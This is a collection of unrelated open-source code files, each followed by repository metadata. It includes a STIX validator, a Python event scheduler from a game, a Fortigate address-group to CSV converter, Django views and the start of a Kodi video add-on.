xpath = " | ".join(to_check)
nodes = root.xpath(xpath, namespaces=namespaces)
msg = "Use of Related_Packages is deprecated."
warns = [BestPracticeWarning(node=x, message=msg) for x in nodes]
return warns
def _get_1_2_package_deprecations(self, root, namespaces):
"""Checks for deprecated fields on STIX Package instances.
"""
to_check = (
"//{0}:STIX_Package".format(common.PREFIX_STIX_CORE),
"//{0}:Package".format(common.PREFIX_STIX_CORE)
)
xpath = " | ".join(to_check)
nodes = root.xpath(xpath, namespaces=namespaces)
warns = []
for node in nodes:
attrib = node.attrib
if 'idref' in attrib:
msg = "@idref is deprecated in STIX Package."
warn = BestPracticeWarning(node=node, message=msg)
warns.append(warn)
if 'timestamp' in attrib:
msg = "@timestamp is deprecated in STIX Package."
warn = BestPracticeWarning(node=node, message=msg)
warns.append(warn)
return warns
def _get_1_2_header_warnings(self, root, namespaces):
"""Checks for deprecated fields on STIX Header instances.
"""
to_check = (
"{0}:Title".format(common.PREFIX_STIX_CORE),
"{0}:Description".format(common.PREFIX_STIX_CORE),
"{0}:Short_Description".format(common.PREFIX_STIX_CORE),
"{0}:Package_Intent".format(common.PREFIX_STIX_CORE),
)
header = "//{0}:STIX_Header".format(common.PREFIX_STIX_CORE)
xpath = " | ".join("%s/%s" % (header, x) for x in to_check)
nodes = root.xpath(xpath, namespaces=namespaces)
fmt = "%s is deprecated in STIX Header."
warns = []
for node in nodes:
localname = utils.localname(node)
msg = fmt % localname
warn = BestPracticeWarning(node=node, message=msg)
warns.append(warn)
return warns
@rule('1.2')
def _check_1_2_deprecations(self, root, namespaces, version): # noqa
"""Checks the input document `root` for fields that were deprecated
in STIX v1.2.
"""
package_warnings = self._get_1_2_package_deprecations(
root=root,
namespaces=namespaces
)
header_warnings = self._get_1_2_header_warnings(
root=root,
namespaces=namespaces
)
tlo_warnings = self._get_1_2_tlo_deprecations(
root=root,
namespaces=namespaces
)
related_package_warnings= self._get_1_2_related_package_deprecations(
root=root,
namespaces=namespaces
)
warns = itertools.chain(
package_warnings,
header_warnings,
tlo_warnings,
related_package_warnings
)
results = BestPracticeWarningCollection("STIX 1.2 Deprecations")
results.extend(warns)
return results
def _get_campaign_related_indicators(self, root, namespaces):
xpath = ".//{0}:Related_Indicators".format(common.PREFIX_STIX_CAMPAIGN)
nodes = root.xpath(xpath, namespaces=namespaces)
msg = "Related_Indicators has been deprecated in Campaign."
return [BestPracticeWarning(node=n, message=msg) for n in nodes]
@rule('1.1')
def _check_1_1_deprecations(self, root, namespaces, version): # noqa
"""Checks the input document `root` for fields that were deprecated
in STIX v1.1.
"""
results = BestPracticeWarningCollection("STIX 1.1 Deprecations")
warns = self._get_campaign_related_indicators(root, namespaces)
results.extend(warns)
return results
def _get_bad_ordinalities(self, nodes, tag, namespaces):
"""Returns a set of warnings for nodes in `nodes` that do not comply
with @ordinality use of descriptive elements.
Args:
nodes: A set of nodes that have more than one instance of `tag`
children.
tag: The localname of the nodes to inspect for ordinalities.
namespaces: A list of STIX namespaces.
"""
def can_inspect(node):
"""Only check nodes that are in the STIX namespace and have a
localname that matches the tag (e.g., 'Description').
"""
qname = etree.QName(node)
return (qname.localname == tag) and (qname.namespace in namespaces)
filtered = []
for node in nodes:
# Filter out fields that belong to non-STIX namespaces
filtered.extend(x for x in utils.iterchildren(node) if can_inspect(x))
warns = []
seen = set()
for node in filtered:
o = node.attrib.get('ordinality')
if o is None:
fmt = "@ordinality missing in '{0}' list."
msg = fmt.format(tag)
warns.append(BestPracticeWarning(node=node, message=msg))
continue
o = int(o) # @ordinality is a xs:positiveInteger type.
if o in seen:
fmt = "@ordinality is duplicate in '{0}' list: '{1}'"
msg = fmt.format(tag, o)
warns.append(BestPracticeWarning(node=node, message=msg))
continue
seen.add(o)
return warns
@rule('1.2')
def _check_structured_text_ordinalities(self, root, namespaces, version): # noqa
"""Checks the input STIX document for correct ordinality usage in
StructuredText lists.
Checks for duplicates and missing ordinality attributes in elements
that have lists of StructuredText instances.
"""
# Selects nodes that have more than one instance of a specific
# StructuredTextType child (i.e., more than one Description child).
xpath_fmt = "//*[count(child::*[local-name()='{0}']) > 1]"
tags = (
"Description",
"Short_Description",
"Description_Of_Effect",
"Business_Function_Or_Role"
)
title = "StructuredText @ordinality Use"
results = BestPracticeWarningCollection(title)
nslist = namespaces.values()
for tag in tags:
xpath = xpath_fmt.format(tag)
nodes = root.xpath(xpath, namespaces=namespaces)
if len(nodes) == 0:
continue
warns = self._get_bad_ordinalities(nodes, tag, nslist)
results.extend(warns)
return results
def _get_rules(self, version):
"""Returns a list of best practice check functions that are applicable
to the STIX `version`.
"""
def can_run(stix_version, rule_min, rule_max):
if not rule_min:
return True
doc_ver = StrictVersion(remove_version_prefix(stix_version))
min_ver = StrictVersion(remove_version_prefix(rule_min))
if rule_max:
max_ver = StrictVersion(remove_version_prefix(rule_max))
return (min_ver <= doc_ver <= max_ver)
return min_ver <= doc_ver
StrictVersion = distutils.version.StrictVersion
all_rules = iteritems(self._rules) # noqa
# Get a generator which yields all best practice methods that are
# assigned a version number <= the input STIX document version number.
rules = []
for (versions, funcs) in all_rules:
min_, max_ = versions
rules.extend(f for f in funcs if can_run(version, min_, max_))
return rules
def _run_rules(self, root, version):
"""Runs all best practice rules applicable to a `version` of STIX
against the `root` document.
"""
namespaces = common.get_stix_namespaces(version)
results = BestPracticeValidationResults()
rules = self._get_rules(version)
for func in rules:
result = func(self, root, namespaces=namespaces, version=version)
results.append(result)
return results
@common.check_stix
def validate(self, doc, version=None):
"""Checks that a STIX document aligns with `suggested authoring
practices`_.
.. _suggested authoring practices: http://stixproject.github.io/documentation/suggested-practices/
Args:
doc: The STIX document. Can be a filename, file-like object,
lxml._Element, or lxml._ElementTree instance.
version: The version of the STIX document. This will determine the
set of best practice rules to check. If ``None`` an attempt
will be made to extract the version from `doc`.
Returns:
An instance of
:class:`.BestPracticeValidationResults`.
Raises:
.UnknownSTIXVersionError: If `version` was ``None`` and `doc`
did not contain any version information.
.InvalidSTIXVersionError: If discovered version or `version`
argument contains an invalid STIX version number.
.ValidationError: If there are any issues parsing `doc`.
"""
# Get the element for the input document
root = utils.get_etree_root(doc)
# Get the STIX version for the input `doc` if one is not passed in.
version = version or common.get_version(root)
# Check that the version number is a valid STIX version number
common.check_version(version)
# Run the best practice checks applicable for the STIX version number.
results = self._run_rules(root, version)
# Return the results
return results
__all__ = [
'STIXBestPracticeValidator',
'BestPracticeValidationResults',
'BestPracticeWarningCollection',
'BestPracticeWarning'
]
|
bsd-3-clause
| 6,831,026,196,110,730,000
| 32.578577
| 106
| 0.583719
| false
| 4.224988
| false
| false
| false
|
Anstow/TeamAwesome
|
game/ext/sched.py
|
1
|
23655
|
"""Event scheduler by Joseph Lansdowne.
Uses Pygame's wait function if available, else the less accurate time.sleep.
To use something else, do:
import sched
sched.wait = wait_function
This function should take the number of milliseconds to wait for. This will
always be an integer.
Python version: 2.
Release: 11-dev.
Licensed under the GNU General Public License, version 3; if this was not
included, you can find it here:
http://www.gnu.org/licenses/gpl-3.0.txt
CLASSES
Timer
Scheduler
FUNCTIONS
interp_linear
interp_target
interp_round
interp_repeat
interp_oscillate
"""
from time import time
from bisect import bisect
from math import cos, atan, exp
from random import randrange, expovariate
try:
from pygame.time import wait
except ImportError:
from time import sleep
def wait (t):
sleep(int(t * 1000))
def ir (x):
"""Returns the argument rounded to the nearest integer."""
# this is about twice as fast as int(round(x))
y = int(x)
return (y + (x - y >= .5)) if x > 0 else (y - (y - x >= .5))
def _match_in_nest (obj, x):
"""Check if every object in a data structure is equal to some given object.
_match_in_nest(obj, x)
obj: data structure to look in: an arbitrarily nested list of lists.
x: object to compare to (not a list or tuple).
"""
if isinstance(obj, (tuple, list)):
return all(_match_in_nest(o, x) == x for o in obj)
else:
return obj == x
def call_in_nest (f, *args):
"""Collapse a number of similar data structures into one.
Used in interp_* functions.
call_in_nest(f, *args) -> result
Each arg in args is a data structure of nested lists with a similar format (eg.
[1, 2, 3, [4, 5], []] and ['a', 'b', 'c', ['d', 'e'], []]). result is a new
structure in the same format with each non-list object the result of calling f
with the corresponding objects from each arg (eg. f = lambda n, c: str(n) + c
produces the result ['1a', '2b', '3c', ['4d', '5e'], []]).
One argument may have a list where others do not. In this case, those that do
not have the object in that place passed to f for each object in the (possibly
further nested) list in the argument that does. For example, given
[1, 2, [3, 4]], [1, 2, 3] and 1, result is
[f(1, 1, 1), f(2, 2, 1), [f(3, 3, 1), f(4, 3, 1)]]. However, in args with
lists, all lists must be the same length.
"""
is_list = [isinstance(arg, (tuple, list)) for arg in args]
if any(is_list):
n = len(args[is_list.index(True)])
# listify non-list args (assume all lists are the same length)
args = (arg if this_is_list else [arg] * n
for this_is_list, arg in zip(is_list, args))
return [call_in_nest(f, *inner_args) for inner_args in zip(*args)]
else:
return f(*args)
def _cmp_structure (x, y):
"""Find whether the (nested list) structure of two objects is the same."""
is_list = isinstance(x, (tuple, list))
if is_list != isinstance(y, (tuple, list)):
# one is a list, one isn't
return False
elif is_list:
# both are lists: check length and contents
return len(x) == len(y) and \
all(_cmp_structure(xi, yi) for xi, yi in zip(x, y))
else:
# neither is a list
return True
def interp_linear (*waypoints):
"""Linear interpolation for Scheduler.interp.
interp_linear(*waypoints) -> f
waypoints: each is (v, t) to set the value to v at time t. t can be omitted
for any but the last waypoint; the first is 0, and other gaps are
filled in with equal spacing. v is like the arguments taken by the
call_in_nest function in this module, and we interpolate for each number in the nested list structure of v. Some objects in the v
structures may be non-numbers, in which case they will not be varied
(maybe your function takes another argument you don't want to vary).
f: a function for which f(t) = v for every waypoint, with intermediate values
linearly interpolated between waypoints.
"""
# fill in missing times
vs = []
ts = []
last = waypoints[-1]
for w in waypoints:
if w is last or _cmp_structure(w, last):
vs.append(w[0])
ts.append(w[1])
else:
vs.append(w)
ts.append(None)
ts[0] = 0
# get groups with time = None
groups = []
group = None
for i, (v, t) in enumerate(zip(vs, ts)):
if t is None:
if group is None:
group = [i]
groups.append(group)
else:
if group is not None:
group.append(i)
group = None
# and assign times within those groups
for i0, i1 in groups:
t0 = ts[i0 - 1]
dt = float(ts[i1] - t0) / (i1 - (i0 - 1))
for i in xrange(i0, i1):
ts[i] = t0 + dt * (i - (i0 - 1))
interp_val = lambda r, v1, v2: (r * (v2 - v1) + v1) \
if isinstance(v1, (int, float)) else v1
def val_gen ():
t = yield
while 1:
# get waypoints we're between
i = bisect(ts, t)
if i == 0:
# before start
t = yield vs[0]
elif i == len(ts):
# past end: use final value, then end
t = yield vs[-1]
yield None # to avoid StopIteration issues
return
else:
v0 = vs[i - 1]
v1 = vs[i]
t0 = ts[i - 1]
t1 = ts[i]
# get ratio of the way between waypoints
r = 1 if t1 == t0 else (t - t0) / (t1 - t0) # t is always float
t = yield call_in_nest(interp_val, r, v0, v1)
# start the generator; get_val is its send method
g = val_gen()
g.next()
return g.send
def interp_target (v0, target, damp, freq = 0, speed = 0, threshold = 0):
"""Move towards a target.
interp_target(v0, target, damp, freq = 0, speed = 0, threshold = 0) -> f
v0: the initial value (a structure of numbers like arguments to this module's
call_in_nest function). Elements which are not numbers are ignored.
target: the target value (has the same form as v0).
damp: rate we move towards the target (> 0).
freq: if damping is low, oscillation around the target can occur, and this
controls the frequency. If 0, there is no oscillation.
speed: if frequency is non-zero, this is the initial 'speed', in the same form
as v0.
threshold: stop when within this distance of the target, in the same form as
v0. If None, never stop. If varying more than one number, only
stop when every number is within its threshold.
f: function that returns position given the current time.
"""
if v0 == target: # nothing to do
return lambda t: None
def get_phase (v0, target, sped):
if freq == 0 or not isinstance(v0, (int, float)) or v0 == target:
return 0
else:
return atan(-(float(speed) / (v0 - target) + damp) / freq)
phase = call_in_nest(get_phase, v0, target, speed)
def get_amplitude (v0, target, phase):
if isinstance(v0, (int, float)):
return (v0 - target) / cos(phase) # cos(atan(x)) is never 0
amplitude = call_in_nest(get_amplitude, v0, target, phase)
def get_val (t):
def interp_val (v0, target, amplitude, phase, threshold):
if not isinstance(v0, (int, float)):
return v0
# amplitude is None if non-number
if amplitude is None or v0 == target:
if threshold is not None:
return None
return v0
else:
dist = amplitude * exp(-damp * t)
if threshold is not None and abs(dist) <= threshold:
return None
return dist * cos(freq * t + phase) + target
rtn = call_in_nest(interp_val, v0, target, amplitude, phase, threshold)
if _match_in_nest(rtn, None):
# all done
rtn = None
return rtn
return get_val
def interp_shake (centre, amplitude = 1, threshold = 0, signed = True):
"""Shake randomly.
interp(centre, amplitude = 1, threshold = 0, signed = True) -> f
centre: the value to shake about; a nested list (a structure of numbers like
arguments to this module's call_in_nest function). Elements which are
not numbers are ignored.
amplitude: a number to multiply the value by. This can be a function that
takes the elapsed time in seconds to vary in time. Has the same
form as centre (return value if a function).
threshold: stop when amplitude is this small. If None, never stop. If varying
more than one number, only stop when every number is within its
threshold.
signed: whether to shake around the centre. If False, values are greater than
centre (not that amplitude may be signed).
f: function that returns position given the current time.
"""
def get_val (t):
def interp_val (centre, amplitude, threshold):
if not isinstance(centre, (int, float)):
return centre
if threshold is not None and abs(amplitude) <= threshold:
return None
val = amplitude * expovariate(1)
if signed:
val *= 2 * randrange(2) - 1
return centre + val
a = amplitude(t) if callable(amplitude) else amplitude
rtn = call_in_nest(interp_val, centre, a, threshold)
if _match_in_nest(rtn, None):
# all done
rtn = None
return rtn
return get_val
def interp_round (get_val, do_round = True):
"""Round the output of an existing interpolation function to integers.
interp_round(get_val, round_val = True) -> f
get_val: the existing function. The values it returns are as the arguments
taken by the call_in_nest function in this module.
do_round: determines which values to round. This is in the form of the values
get_val returns, a structure of lists and booleans corresponding to
each number in get_val. Any list in this structure can be replaced
by a single boolean to apply to the entire (nested) list. Non-number
objects in the value's structure are ignored.
f: the get_val wrapper that rounds the returned value.
"""
def round_val (do, v):
return ir(v) if isinstance(v, (int, float)) and do else v
def round_get_val (t):
return call_in_nest(round_val, do_round, get_val(t))
return round_get_val
def interp_repeat (get_val, period, t_min = 0, t_start = None):
"""Repeat an existing interpolation function.
interp_repeat(get_val, period, t_min = 0, t_start = t_min) -> f
get_val: an existing interpolation function, as taken by Scheduler.interp.
Times passed to the returned function are looped around to fit in the range
[t_min, t_min + period), starting at t_start, and the result is passed to
get_val.
f: the get_val wrapper that repeats get_val over the given period.
"""
if t_start is None:
t_start = t_min
return lambda t: get_val(t_min + (t_start - t_min + t) % period)
def interp_oscillate (get_val, t_max, t_min = 0, t_start = None):
"""Repeat a linear oscillation over an existing interpolation function.
interp_oscillate(get_val, t_max, t_min = 0, t_start = t_min) -> f
get_val: an existing interpolation function, as taken by Scheduler.interp.
Times passed to the returned function are looped and reversed to fit in the
range [t_min, t_max), starting at t_start. If t_start is in the range
[t_max, 2 * t_max + - t_min), it is mapped to the 'return journey' of the
oscillation.
f: the generated get_val wrapper.
"""
if t_start is None:
t_start = t_min
period = t_max - t_min
def osc_get_val (t):
t = (t_start - t_min + t) % (2 * period)
if t >= period:
t = 2 * period - t
return get_val(t_min + t)
return osc_get_val
class Timer (object):
"""Simple timer.
Either call run once and stop if you need to, or step every time you've done
what you need to.
CONSTRUCTOR
Timer(fps = 60)
fps: frames per second to aim for.
METHODS
run
step
stop
ATTRIBUTES
fps: the current target FPS. Set this directly.
frame: the current length of a frame in seconds.
t: the time at the last step, if using individual steps.
"""
def __init__ (self, fps = 60):
self.fps = fps
self.t = time()
def run (self, cb, *args, **kwargs):
"""Run indefinitely or for a specified amount of time.
run(cb, *args[, seconds][, frames]) -> remain
cb: a function to call every frame.
args: extra arguments to pass to cb.
seconds, frames: keyword-only arguments that determine how long to run for. If
seconds is passed, frames is ignored; if neither is given, run
forever (until Timer.stop is called). Either can be a float.
Time passed is based on the number of frames that have passed,
so it does not necessarily reflect real time.
remain: the number of frames/seconds left until the timer has been running for
the requested amount of time (or None, if neither were given). This
may be less than 0 if cb took a long time to run.
"""
self.stopped = False
seconds = kwargs.get('seconds')
frames = kwargs.get('frames')
if seconds is not None:
seconds = max(seconds, 0)
elif frames is not None:
frames = max(frames, 0)
# main loop
t0 = time()
while 1:
frame = self.frame
cb(*args)
t = time()
t_gone = min(t - t0, frame)
if self.stopped:
if seconds is not None:
return seconds - t_gone
elif frames is not None:
return frames - t_gone / frame
else:
return None
t_left = frame - t_gone # until next frame
if seconds is not None:
t_left = min(seconds, t_left)
elif frames is not None:
t_left = min(frames, t_left / frame)
if t_left > 0:
wait(int(1000 * t_left))
t0 = t + t_left
else:
t0 = t
if seconds is not None:
seconds -= t_gone + t_left
if seconds <= 0:
return seconds
elif frames is not None:
frames -= (t_gone + t_left) / frame
if frames <= 0:
return frames
def step (self):
"""Step forwards one frame."""
t = time()
t_left = self.t + self.frame - t
if t_left > 0:
wait(int(1000 * t_left))
self.t = t + t_left
else:
self.t = t
def stop (self):
"""Stop any current call to Timer.run."""
self.stopped = True
@property
def fps (self):
return self._fps
@fps.setter
def fps (self, fps):
self._fps = int(round(fps))
self.frame = 1. / fps
class Scheduler (Timer):
"""Simple event scheduler (Timer subclass).
Takes the same arguments as Timer.
METHODS
add_timeout
rm_timeout
interp
interp_simple
"""
def __init__ (self, fps = 60):
Timer.__init__(self, fps)
self._cbs = {}
self._max_id = 0
def run (self, seconds = None, frames = None):
"""Start the scheduler.
run([seconds][, frames]) -> remain
Arguments and return value are as for Timer.run.
"""
return Timer.run(self, self._update, seconds = seconds,
frames = frames)
def step (self):
self._update()
Timer.step(self)
def add_timeout (self, cb, *args, **kwargs):
"""Call a function after a delay.
add_timeout(cb, *args[, seconds][, frames][, repeat_seconds][, repeat_frames])
-> ID
cb: the function to call.
args: list of arguments to pass to cb.
seconds: how long to wait before calling, in seconds (respects changes to FPS).
If passed, frames is ignored.
frames: how long to wait before calling, in frames (same number of frames even
if FPS changes).
repeat_seconds, repeat_frames:
how long to wait between calls; time is determined as for the seconds and
frames arguments. If repeat_seconds is passed, repeat_frames is ignored;
if neither is passed, the initial time delay is used between calls.
ID: an ID to pass to rm_timeout. This is guaranteed to be unique over time.
Times can be floats, in which case part-frames are carried over, and time
between calls is actually an average over a large enough number of frames.
The called function can return a boolean True object to repeat the timeout;
otherwise it will not be called again.
"""
seconds = kwargs.get('seconds')
frames = kwargs.get('frames')
repeat_seconds = kwargs.get('repeat_seconds')
repeat_frames = kwargs.get('repeat_frames')
if seconds is not None:
frames = None
if repeat_seconds is not None:
repeat_frames = None
elif repeat_frames is None:
repeat_seconds = seconds
repeat_frames = frames
self._cbs[self._max_id] = [seconds, frames, repeat_seconds,
repeat_frames, cb, args]
self._max_id += 1
# ID is key in self._cbs
return self._max_id - 1
def rm_timeout (self, *ids):
"""Remove the timeouts with the given IDs."""
for i in ids:
try:
del self._cbs[i]
except KeyError:
pass
def _update (self):
"""Handle callbacks this frame."""
cbs = self._cbs
frame = self.frame
# cbs might add/remove cbs, so use items instead of iteritems
for i, data in cbs.items():
if i not in cbs:
# removed since we called .items()
continue
if data[0] is not None:
remain = 0
dt = frame
else:
remain = 1
dt = 1
data[remain] -= dt
if data[remain] <= 0:
# call callback
if data[4](*data[5]):
# add on delay
total = 0 if data[2] is not None else 1
data[not total] = None
data[total] += data[total + 2]
elif i in cbs: # else removed in above call
del cbs[i]
def interp (self, get_val, set_val, t_max = None, val_min = None,
val_max = None, end = None, round_val = False,
multi_arg = False):
"""Vary a value over time.
interp(get_val, set_val[, t_max][, val_min][, val_max][, end],
round_val = False, multi_arg = False) -> timeout_id
get_val: a function called with the elapsed time in seconds to obtain the
current value. If this function returns None, the interpolation will
be canceled. The interp_* functions in this module can be used to
construct such functions. The value must actually be a list of
arguments to pass to set_val (unless set_val is (obj, attr)).
set_val: a function called with the current value to set it. This may also be
an (obj, attr) tuple to do obj.attr = val.
t_max: if time becomes larger than this, cancel the interpolation.
val_min, val_max: minimum and maximum values of the interpolated value. If
given, get_val must only return values that can be compared
with these. If the value ever falls outside of this range,
set_val is called with the value at the boundary it is beyond
(val_min or val_max) and the interpolation is canceled.
end: used to do some cleanup when the interpolation is canceled (when get_val
returns None or t_max, val_min or val_max comes into effect, but not when
the rm_timeout method is called with the returned id). This can be a
final value to pass to set_val, or a function to call without arguments.
If the function returns a (non-None) value, set_val is called with it.
round_val: whether to round the value(s) (see the interp_round function in this
module for other possible values).
multi_arg: whether values should be interpreted as lists of arguments to pass
to set_val instead of a single list argument.
timeout_id: an identifier that can be passed to the rm_timeout method to remove
the callback that continues the interpolation. In this case the
end argument is not respected.
"""
if round_val:
get_val = interp_round(get_val, round_val)
if not callable(set_val):
obj, attr = set_val
set_val = lambda val: setattr(obj, attr, val)
def timeout_cb ():
t = 0
last_v = None
done = False
while 1:
t += self.frame
v = get_val(t)
if v is None:
done = True
# check bounds
elif t_max is not None and t > t_max:
done = True
else:
if val_min is not None and v < val_min:
done = True
v = val_min
elif val_max is not None and v > val_max:
done = True
v = val_max
if v != last_v:
set_val(*v) if multi_arg else set_val(v)
last_v = v
if done:
# canceling for some reason
if callable(end):
v = end()
else:
v = end
# set final value if want to
if v is not None and v != last_v:
set_val(*v) if multi_arg else set_val(v)
yield False
# just in case we get called again (should never happen)
return
else:
yield True
return self.add_timeout(timeout_cb().next, frames = 1)
def interp_simple (self, obj, attr, target, t, end_cb = None,
round_val = False):
"""A simple version of the interp method.
Varies an object's attribute linearly from its current value to a target value
in a set amount of time.
interp_simple(obj, attr, target, t[, end], round_val = False) -> timeout_id
obj, attr: this function varies the attribute attr of the object obj.
target: a target value, in the same form as the current value in the given
attribute.
t: the amount of time to take to reach the target value.
end_cb: a function to call when the target value has been reached.
round_val: whether to round the value(s) (see the interp_round function in this
module for other possible values).
timeout_id: an identifier that can be passed to the rm_timeout method to remove
the callback that continues the interpolation. In this case end_cb
is not called.
"""
get_val = interp_linear(getattr(obj, attr), (target, t))
self.interp(get_val, (obj, attr), end = end_cb, round_val = round_val)
|
gpl-3.0
| 7,478,932,857,420,847,000
| 33.035971
| 141
| 0.581695
| false
| 3.86078
| false
| false
| false
|
walterbender/yupana
|
utils.py
|
1
|
1166
|
#Copyright (c) 2011,12 Walter Bender
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# You should have received a copy of the GNU General Public License
# along with this library; if not, write to the Free Software
# Foundation, 51 Franklin Street, Suite 500 Boston, MA 02110-1335 USA
from StringIO import StringIO
import json
json.dumps
from json import load as jload
from json import dump as jdump
def json_load(text):
""" Load JSON data using what ever resources are available. """
# strip out leading and trailing whitespace, nulls, and newlines
io = StringIO(text)
try:
listdata = jload(io)
except ValueError:
# assume that text is ascii list
listdata = text.split()
for i, value in enumerate(listdata):
listdata[i] = int(value)
return listdata
def json_dump(data):
""" Save data using available JSON tools. """
_io = StringIO()
jdump(data, _io)
return _io.getvalue()
|
gpl-3.0
| 2,220,261,143,581,196,300
| 29.684211
| 70
| 0.698971
| false
| 4.006873
| false
| false
| false
|
maaaaz/fgpoliciestocsv
|
fggroupstocsv.py
|
1
|
6311
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is part of fgpoliciestocsv.
#
# Copyright (C) 2014, 2020, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# fgpoliciestocsv is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# fgpoliciestocsv is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with fgpoliciestocsv. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from os import path
import io
import sys
import re
import csv
import os
# OptionParser imports
from optparse import OptionParser
from optparse import OptionGroup
# Options definition
parser = OptionParser(usage="%prog [options]")
main_grp = OptionGroup(parser, 'Main parameters')
main_grp.add_option('-i', '--input-file', help='Partial or full Fortigate configuration file. Ex: fgfw.cfg')
main_grp.add_option('-o', '--output-file', help='Output csv file (default ./groups-out.csv)', default=path.abspath(path.join(os.getcwd(), './groups-out.csv')))
main_grp.add_option('-s', '--skip-header', help='Do not print the csv header', action='store_true', default=False)
main_grp.add_option('-n', '--newline', help='Insert a newline between each group for better readability', action='store_true', default=False)
main_grp.add_option('-d', '--delimiter', help='CSV delimiter (default ";")', default=';')
main_grp.add_option('-e', '--encoding', help='Input file encoding (default "utf8")', default='utf8')
parser.option_groups.extend([main_grp])
# Python 2 and 3 compatibility
if (sys.version_info < (3, 0)):
fd_read_options = 'r'
fd_write_options = 'wb'
else:
fd_read_options = 'r'
fd_write_options = 'w'
# Handful patterns
# -- Entering group definition block
p_entering_group_block = re.compile(r'^\s*config firewall addrgrp$', re.IGNORECASE)
# -- Exiting group definition block
p_exiting_group_block = re.compile(r'^end$', re.IGNORECASE)
# -- Commiting the current group definition and going to the next one
p_group_next = re.compile(r'^next$', re.IGNORECASE)
# -- Policy number
p_group_name = re.compile(r'^\s*edit\s+"(?P<group_name>.*)"$', re.IGNORECASE)
# -- Policy setting
p_group_set = re.compile(r'^\s*set\s+(?P<group_key>\S+)\s+(?P<group_value>.*)$', re.IGNORECASE)
# Functions
def parse(options):
"""
Parse the data according to several regexes
@param options: options
@rtype: return a list of groups ( [ {'id' : '1', 'srcintf' : 'internal', ...}, {'id' : '2', 'srcintf' : 'external', ...}, ... ] )
and the list of unique seen keys ['id', 'srcintf', 'dstintf', ...]
"""
global p_entering_group_block, p_exiting_group_block, p_group_next, p_group_name, p_group_set
in_group_block = False
group_list = []
group_elem = {}
order_keys = []
with io.open(options.input_file, mode=fd_read_options, encoding=options.encoding) as fd_input:
for line in fd_input:
line = line.strip()
# We match a group block
if p_entering_group_block.search(line):
in_group_block = True
# We are in a group block
if in_group_block:
if p_group_name.search(line):
group_name = p_group_name.search(line).group('group_name')
group_elem['name'] = group_name
if not('name' in order_keys): order_keys.append('name')
# We match a setting
if p_group_set.search(line):
group_key = p_group_set.search(line).group('group_key')
if not(group_key in order_keys): order_keys.append(group_key)
group_value = p_group_set.search(line).group('group_value').strip()
group_value = re.sub('["]', '', group_value)
group_elem[group_key] = group_value
# We are done with the current group id
if p_group_next.search(line):
group_list.append(group_elem)
group_elem = {}
# We are exiting the group block
if p_exiting_group_block.search(line):
in_group_block = False
return (group_list, order_keys)
def generate_csv(results, keys, options):
"""
Generate a plain ';' separated csv file
"""
if results and keys:
with io.open(options.output_file, mode=fd_write_options) as fd_output:
spamwriter = csv.writer(fd_output, delimiter=options.delimiter, quoting=csv.QUOTE_ALL, lineterminator='\n')
if not(options.skip_header):
spamwriter.writerow(keys)
for group in results:
output_line = []
for key in keys:
if key in group.keys():
if "member" == key:
output_line.append("\n".join(group[key].split(" ")))
else:
output_line.append(group[key])
else:
output_line.append('')
spamwriter.writerow(output_line)
if options.newline:
spamwriter.writerow('')
fd_output.close()
return None
def main():
"""
Dat main
"""
global parser
options, arguments = parser.parse_args()
if (options.input_file == None):
parser.error('Please specify a valid input file')
results, keys = parse(options)
generate_csv(results, keys, options)
return None
if __name__ == "__main__" :
main()
|
gpl-3.0
| 8,581,508,258,251,817,000
| 34.857955
| 159
| 0.58501
| false
| 3.881304
| false
| false
| false
|
anshulkgupta/viznow
|
gary/mhacks/views.py
|
1
|
1927
|
import os
import json
from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
#from mhacks.equities import Field
EQUITY_MAP = {
'AAPL': 'AAPL US EQUITY'
}
def home_page(request):
return render(request, 'home.html')
def uber_page(request):
return render(request, 'final_uber.html')
def enter_page(request):
return render(request, 'enter.html')
def airline_page(request):
return render(request, 'flightanimation.html')
def bubble_page(request):
return render(request, 'custom_final_bubble.html')
def globe_page(request):
return render(request, 'custom_final_globe.html')
def chord_page(request):
return render(request, 'custom_final_chord.html')
def line_page(request):
return render(request, 'custom_final_line.html')
def chloropleth_page(request):
return render(request, 'custom_final_chloropleth.html')
def final_custom_page(request, page, id):
return render(request, 'custom_final.html', {'page' : page, 'id': id})
def fileupload_page(request, page, id):
return render(request, 'fileupload.html', {'page' : page, 'id': id})
def upload_page(request):
return render(request, 'upload1.html')
def upload_unique_page(request, id):
return render(request, 'upload_unique.html', {'page' : id})
def visualization_page(request, page, id):
return render(request, 'visualization.html', {'page': page, 'id': id})
@csrf_exempt
def handle_upload(request):
#equities = request.post['equities']
#str_param = EQUITY_MAP.get(equities)
root = os.path.dirname(__file__)
json_file = '%s/equities/fixtures/newstock.json' % root
json_data = open(json_file).read()
equities = json.loads(json_data.replace('\n', ''))
#field = Field(str_param)
#return HttpResponse(field.getData(), content_type="application/json")
return JsonResponse(equities)
|
mit
| -4,921,216,448,401,089,000
| 27.776119
| 72
| 0.728075
| false
| 3.148693
| false
| false
| false
|
marcela2/minhatv
|
plugin.video.rtpplay/resources/ondemand.py
|
1
|
9380
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
Author: enen92
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import xbmc,xbmcgui,xbmcaddon,xbmcplugin,xbmcvfs,sys,os,re
from common_variables import *
from directory import *
from webutils import *
from utilities import *
from resolver import *
from rtpplayer import *
from iofile import *
def list_tv_shows(name,url):
try:
page_source = abrir_url(url)
except:
page_source = ''
